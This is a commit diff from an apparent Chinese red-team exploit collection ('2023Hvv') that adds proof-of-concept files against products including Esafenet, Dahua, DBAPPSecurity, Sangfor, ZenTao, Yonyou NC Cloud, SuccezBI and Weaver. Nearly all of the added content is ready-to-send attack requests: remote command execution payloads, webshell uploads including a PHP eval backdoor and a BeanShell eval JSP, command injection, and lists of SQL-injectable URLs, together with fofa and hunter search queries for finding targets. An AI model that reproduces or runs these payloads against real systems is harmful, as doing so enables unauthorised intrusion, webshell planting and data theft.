STRLCPY/2023Hvv

■ ■ ■ ■ ■ ■

README.md

		skipped 1 lines
2	2
3	3		由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。所涉及工具来自网络，安全性自测。
4	4
	5	+	# 8月17新增
5	6
	7	+	亿赛通电子文档安全管理系统远程命令执行漏洞
	8	+
	9	+	大华车载系统任意文件上传漏洞POC
	10	+
	11	+	深信服报表（更新）
	12	+
	13	+	禅道18.0~18.3 backstage命令注入
	14	+
	15	+	安恒明御安全网关rce
	16	+
	17	+	赛思SuccezBI前台任意文件上传
	18	+
	19	+	泛微9存在sql注入
	20	+
	21	+	用友 NC Cloud jsinvoke 任意文件上传漏洞（更新）
6	22
7	23		# 8月16新增
8	24
		skipped 227 lines

亿赛通电子文档安全管理系统远程命令执行漏洞.assets/image-20230817154002253.png

亿赛通电子文档安全管理系统远程命令执行漏洞.assets/image-20230817154015678.png

■ ■ ■ ■ ■ ■

亿赛通电子文档安全管理系统远程命令执行漏洞.md

1	+	来源Matrix SEC
2	+
3	+	0x01 影响版本
4	+
5	+	亿赛通电子文档安全管理系统
6	+
7	+	0x02 网络测绘
8	+
9	+	fofa:
10	+
11	+	```
12	+	app="亿赛通-电子文档安全管理系统"
13	+	```
14	+
15	+	hunter:
16	+
17	+	```
18	+	web.title="电子文档安全管理系统"
19	+	```
20	+
21	+	0x03 漏洞复现
22	+
23	+	![image-20230817154002253](./亿赛通电子文档安全管理系统远程命令执行漏洞.assets/image-20230817154002253.png)
24	+
25	+	```
26	+	POST /solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
27	+	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.1383.67 Safari/537.36
28	+	Accept-Encoding: gzip, deflate
29	+	Accept: /
30	+	Connection: close
31	+	Host:
32	+	Content-Length: 78
33	+
34	+	<?xml version="1.0" encoding="UTF-8"?>
35	+	<RDF>
36	+	<item/>
37	+	</RDF>
38	+
39	+	```
40	+
41	+	![image-20230817154015678](./亿赛通电子文档安全管理系统远程命令执行漏洞.assets/image-20230817154015678.png)

■ ■ ■ ■ ■ ■

大华车载系统任意文件上传漏洞POC.md

1	+	```
2	+	POST /vehicleServer/carDev/icon/import/1?iconType=1 HTTP/1.1
3	+	Host: ip:port
4	+	Accept: /
5	+	Accept-Encoding: gzip， deflate， br
6	+	Content-Length: 872
7	+	Content-Type: multipart/form-data; boundary=----63766573e5aegeegaa8cesaea4
8	+	User-Agent: Mozilla/5.0 (Windows NT 6.2: Win64: X64) Applewebkit/537.36 (KHTML, like Gecko) QtwebEngine/5.9.1 Chrome/56.0.2924.122 Safari/537.36
9	+
10	+	------63766573e5aegeegaa8cesaea4
11	+	Content-Disposition: form-data; name="file"; filename="test.jsp"
12	+	Content-ype: image/png
13	+
14	+	GIF89a
15	+	<%isp 马%>
16	+	------63766573e5ae9ee9aa8ce5aea4
17	+	```
18	+
19	+	获取路径:
20	+
21	+	```
22	+	GET /vehicleServer/carDev/icon/getIconList?nowTime=164605907220
23	+	```
24	+
25	+
26	+
27	+

■ ■ ■ ■ ■ ■

安恒明御安全网关rce.md

1	+	```
2	+	GET /webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1\|echo+"<%3fphp+eval(\$_POST[\"a\"]);?>"+>+.xxx.php HTTP/1.1
3	+	Host: xxx
4	+	Cookie: USGSESSID=495b895ddd42b82cd89a29f241825081
5	+	Pragma: no-cache
6	+	Cache-Control: no-cache
7	+	Upgrade-Insecure-Requests: 1
8	+	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 16 0) Applewebkit/537.36 (KHTML likeGecko) Chrome/78.0.3994.108 Safari/537.36
9	+	Sec-Fetch-User: ?1
10	+	Accept:
11	+	text/html,application/xhtml+xml,application/xml;g=0.9,image/webp,image/apng,/;g=0.8,application/signed-exchange;v=b3
12	+	Sec-Fetch-Site: none
13	+	Sec-Fetch-Mode: navigate
14	+	Accept-Encoding: gzip， deflate
15	+	Accept-Language: zh-CN,zh;q=0.9
16	+	Connection: close
17	+	```
18	+
19	+	木马地址: http://xxx/webui/.xxx.php

泛微9存在sql注入.assets/image-20230817150348901.png

■ ■ ■ ■ ■ ■

泛微9存在sql注入.md

1	+	来源Hugh [和光同尘hugh](javascript:void(0);)
2	+
3	+	影响版本
4	+
5	+	![image-20230817150348901](./泛微9存在sql注入.assets/image-20230817150348901.png)
6	+
7	+	```
8	+	(1)/E-mobile/flowdo_page.php?diff=delete&RUN_ID=1 //参数RUN_ID
9	+	(2)/E-mobile/flowdo_page.php?diff=delete&flowid=1 //参数flowid
10	+	(3)/E-mobile/flowsorce_page.php?flowid=2
11	+	(4)/E-mobile/flownext_page.php?diff=candeal&detailid=2
12	+	(5)/E-mobile/flowimage_page.php?FLOW_ID=2
13	+	(6)/E-mobile/flowform_page.php?FLOW_ID=2
14	+	(7)/E-mobile/diaryother_page.php?searchword=23
15	+	(8)/E-mobile/create/ajax_do.php?diff=word&sortid=1 //参数sortid
16	+	(9)/E-mobile/create/ajax_do.php?diff=word&idstr=2 //参数idstr
17	+	(10)/E-mobile/flow/freeflowimg.php?RUN_ID=1
18	+	(11)/E-mobile/create/ajax_do.php?diff=addr&sortid=1 //参数sortid
19	+	(12)/E-mobile/create/ajax_do.php?diff=addr&userdept=1 //参数userdept
20	+	(13)/E-mobile/create/ajax_do.php?diff=addr&userpriv=1 //参数userpriv
21	+	(14)/E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1 //参数idstr
22	+	(15)/E-mobile/flow/flowhave_page.php?detailid=2,3
23	+	(16)/E-mobile/flow/flowtype_free.php?flowid=1
24	+	(17)/E-mobile/flow/flowtype_free.php?runid=1
25	+	(18)/E-mobile/flow/flowtype_other.php?flowid=1
26	+	(19)/E-mobile/flow/flowtype_other.php?runid=1
27	+	(20)/E-mobile/flow/freeflowimage_page.php?fromid=2
28	+	(21)/E-mobile/flow/freeflowimage_page.php?diff=new&runid=2 //参数runid
29	+
30	+	```
31	+
32	+
33	+
34	+

■ ■ ■ ■ ■ ■

深信服报表.md

		skipped 19 lines
20	20		```
21	21
22	22
	23	+
	24	+	poc2
	25	+
	26	+	```
	27	+	POST /rep/login HTTP/1.1
	28	+	Host:
	29	+	Cookie:
	30	+	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0s X 10.15: ry:109.0)Gecko/20100101 Firefox/115.0 Accept:text/html,application/xhtml+xml,application/xml;g=0,9, image/avif, image/webp,/;q=0.8
	31	+	Accept-Language:zh-CN, zh;g=0.8, zh-TW;g=0.7, zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
	32	+	Accept-Encoding: gzip deflate
	33	+	Upgrade-Insecure-Requests: 1
	34	+	Sec-Fetch-Dest: document
	35	+	Sec-Fetch-Mode: navigate
	36	+	Sec-Fetch-Site: cross-site
	37	+	Pragma: no-cache
	38	+	Cache-Control: no-cache14
	39	+	Te: trailers
	40	+	Connection: close
	41	+	Content-Type:application/x-www-form-urlencoded
	42	+	Content-Length: 126
	43	+
	44	+	clsMode=cls_mode_login%0Awhoami%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
	45	+	```
	46	+
	47	+

■ ■ ■ ■ ■ ■ ■

用友 NC Cloud jsinvoke 任意文件上传漏洞.md

		skipped 3 lines
4	4
5	5		app="用友-NC-Cloud"
6	6
	7	+	# 影响版本
	8	+
	9	+	```
	10	+	NC63、NC633、NC65NC Cloud1903、NC Cloud1909NC Cloud2005、NC Cloud2105、NC Cloud2111
	11	+	```
	12	+
	13	+	POC1
	14	+
7	15		```
8	16		POST /uapjs/jsinvoke/?action=invoke
9	17		Content-Type: application/json
		skipped 12 lines
22	30		}
23	31		```
24	32
25		-
	33	+	POC2
26	34
27	35		```
28	36		POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
		skipped 14 lines
43	51		"webapps/nc_web/301.jsp"
44	52		]
45	53		}
	54	+	```
	55	+
	56	+	POC3
	57	+
	58	+	```
	59	+	POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
	60	+	Host: 192.168.0.11:8089
	61	+	Content-Length: 249
	62	+	Accept: /
	63	+
	64	+	{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/1ndex.jsp"]}
	65	+	```
	66	+
	67	+	访问1ndex.jsp，命令执行成功！
	68	+
	69	+	```
	70	+	https://192.168.0.11:8089/1ndex.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream())
	71	+	```
	72	+
	73	+
	74	+
	75	+	```
	76	+	GET /1ndex.jsp?error=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(%22whoami%22).getInputStream()) HTTP/1.1
	77	+	Host: 192.168.0.11:8089
	78	+	Cache-Control: max-age=0
	79	+	Upgrade-Insecure-Requests: 1
	80	+	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
	81	+	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
	82	+	Accept-Encoding: gzip, deflate
	83	+	Accept-Language: zh-CN,zh;q=0.9
	84	+	Connection: close
46	85		```
47	86
48	87

■ ■ ■ ■ ■ ■

禅道18.0~18.3 backstage命令注入.md

1	+	```
2	+	posT /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
3	+	Host: 127.0.0.1
4	+	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win4; x64; rv:109.0) Gecko/20100101 Firefox/110.0
5	+	Accept: application/json，text/javascript，/; g=0.01
6	+	Accept-Language: zh-CN,zh;g=0.8,zh-Tw;g=0.7,zh-HK;g=0.5,en-US;g=0.3,en;g=0.2
7	+	Accept-Encoding: gzip， deflate
8	+	Referer: http://127.0.0.1/zentaopms/www/index.php?m=zahost&f=create
9	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
10	+	X-Requested-with: XMLHttpRequest
11	+	Content-Length: 134
12	+	Origin: http://127.0.0.1
13	+	Connection: close
14	+	Cookie: zentaosid=dhjpu2i3g5116j5eba85agl27f; lang=zh-cn; device=desktop; theme=default;tab=qa; windowwidth=1632; windowHeight=783
15	+	Sec-Fetch-Dest: empty
16	+	Sec-Fetch-Mode: cors
17	+	Sec-Fetch-Site: same-origin
18	+
19	+	vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0,1%7Ccalc.exe&cpuCores=2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
20	+	```
21	+
22	+

■ ■ ■ ■ ■ ■

赛思SuccezBI前台任意文件上传.md

1	+	```
2	+	POsT /succezbi/sz/commons/form/file/uploadChunkFile:guid=../tomcat/webapps/ROOT/&chunk=ss.jsp HTTP/1.1
3	+	Host: 10.168.4.99:808
4	+	Content-Length: 49564
5	+	Cache-Control: max-age=0
6	+	Upgrade-Insecure-Requests: 1
7	+	Origin: null
8	+	Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8GeAY18LCxR7XnVp
9	+	User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 15 7) Applewebkit/537.36 (KHTML, likeGecko) Chrome/106.9.. Safari/537.36
10	+	Accept:
11	+	text/html,application/xhtml+xml,application/xml;g=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
12	+	Accept-Encoding: gzip， deflate
13	+	Accept-Language: zh-CN,zh;g=0.9
14	+	Cookie: JSESSIONID=7351EFC189410384FF702A41106FF4A2
15	+	Connection: close
16	+
17	+	-----WebKitFormBoundarv8GeAY18LCXR7XnVPContent-Disposition:
18	+	form-data; name="file"; filename="ww'
19	+	Content-Type: image/jpeg
20	+
21	+	webshell
22	+	-----WebKitFormBoundarv8GeAY18LCXR7XnVP
23	+	Content-Disposition: form-data; name="tijiao'
24	+
25	+	confirm
26	+	------WebKitFormBoundarv8GeAY18LCXR7XnVP--
27	+	```
28	+
29	+
30	+
31	+	木马地址：ww_ss.jsp

new